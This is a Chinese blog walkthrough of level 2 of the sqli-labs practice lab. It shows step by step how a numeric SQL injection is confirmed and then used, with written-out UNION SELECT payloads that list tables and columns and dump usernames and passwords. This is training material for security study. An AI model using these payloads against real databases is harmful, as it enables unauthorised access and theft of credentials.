sqli-labs全通关(1-75)之LESS2 GET - Error based - Intiger based

已于 2024-10-02 14:49:47 修改
阅读量173 收藏 3
点赞数 6
分类专栏: sqli-labs通关 文章标签: SQL注入 渗透测试
于 2024-08-06 23:37:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guanrongl/article/details/140967962
版权

lesson-2-GET - Error based - Intiger based

在这里插入图片描述

在这里插入图片描述

一、判断是否存在注入点

使用单引号 ’ 验证是否有注入点
在这里插入图片描述
报错,即存在注入点。

二、判断注入类型

用减法判断注入类型;
当id=1 时,返回结果Dumb
在这里插入图片描述
当id=2-1 时,返回结果也是Dumb,
在这里插入图片描述
结果一直,所以时数字型注入。

三、破解 SQL 查询语句中的字段数

使用 order by N 判断字段数

在这里插入图片描述
order by 3 时正常返回,而order by 4 时,返回错误,所以字段数为3列。

四、获取当前数据库

union select 联合查询获取数据库:

-1 union select 1,2,database()

在这里插入图片描述
得到数据库名:security

五、获取数据库中的表

根据数据库名,查表名,构造 union select

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'

在这里插入图片描述
得到四张表:emails,referers,uagents,users

六、获取表中的字段名

以users为例,获取user表的字段名,构造 union select

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users'

在这里插入图片描述
得到 字段:id,username,password

七、查询到账户的数据

构造uniot select 爆破数据

-1 union select 1,2,group_concat(id,':',username,':',password) from users

在这里插入图片描述
得到数据。

什么鬼昵称
关注
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 2361
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安新手编写,旨在引导他们深入了解SQL注入SQLi)这一严重的安漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs通关(1-75)之Less-1 GET - Error based - Single quotes - String
guanrongl的专栏
08-05 292
3、用 and ‘1’='1 和 and ‘1’='2来判断,1’ and ‘1’ = '1,页面运行正常,而1’ and ‘1’ = '2,页面运行错误,则说明此 Sql 注入为字符型注入。2、用 and 1=1 和 and 1=2 来判断,两者都能正常回显则是字符型注入,否则是数字型注入。1、用减法判断:利用id=2-1 如果返回的是id=1的结果,则是数字注入,否则是字符注入。id=1’ order by 3 --+ // --+ 是注释。当 id=2-1,得到结果为Angelina ,
sqli-labs通关(1-75)之Less-4 GET - Error based - Double Quotes - String
guanrongl的专栏
08-12 162
Less-4 GET - Error based - Double Quotes - String
sqli-labs通关(1-75)之Less-3 GET - Error based - Single quotes with twist string
guanrongl的专栏
08-07 90
三、破解 SQL 查询语句中的字段数。一、判断是否存在注入点。五、获取数据库中的表。六、获取表中的字段名。七、查询到账户的数据。
Sqli-labs靶场通关(1-20关)
2301_77977773的博客
07-03 546
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
DAY22:sqli-labs 靶场通关wp(Less01~~Less20)
qq_49433473的博客
08-04 1155
Sqli-labs靶场 1-20关通关手册,报错注入及其详细。
SQL注入SQLI-LABS靶场通关秘籍
Sunnie_yoo的博客
07-03 1281
反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。因此网页存在字符型注入漏洞,并且使用单引号和括号进行闭合,注意到此网页并没有返回任何信息,我们需要使用 Bool 盲注进行注入。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用“#”注释掉后面的内容注入,网页提示我们注入成功,由于此时使用的时单引号闭合,因此这里是字符型注入。
sqli-labs通关(less1~less10)
箭雨镜屋
08-16 1万+
这10关都是GET型的,包括了union注入、报错注入、布尔盲注和时间盲注,虽然包含了几种闭合方式,但是没有涉及到过滤和绕过,是最基础的关卡。
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安专家。每个级别都设计了一个具有不同安漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
基于Vue框架的鱿鱼导航前端开发设计源码
10-02
该项目是一款基于Vue框架开发的鱿鱼导航前端设计源码,包含122个文件,涵盖23个JavaScript文件、23个Java文件、10个PNG图片、9个Vue组件、7个CSS样式表、5个XML配置文件、4个JSON数据文件、4个YAML配置文件、4个JPG图片文件和3个Git忽略文件。该项目以HTML和CSS为基础,通过JavaScript和Vue.js实现动态交互和用户界面设计。
安徽大学在江西2020-2024各专业最低录取分数及位次表.pdf
10-02
那些年,与你同分同位次的同学都去了哪里?国各大学在江西2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
2021美赛D题参考翻译(第一版)(PDF文档)
最新发布
10-02
2021美赛D题参考翻译(第一版)(PDF文档) 【音乐影响力的量化模型】
Xshell-8.0.0057p.exe
10-02
Xshell-8.0.0057安装包
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值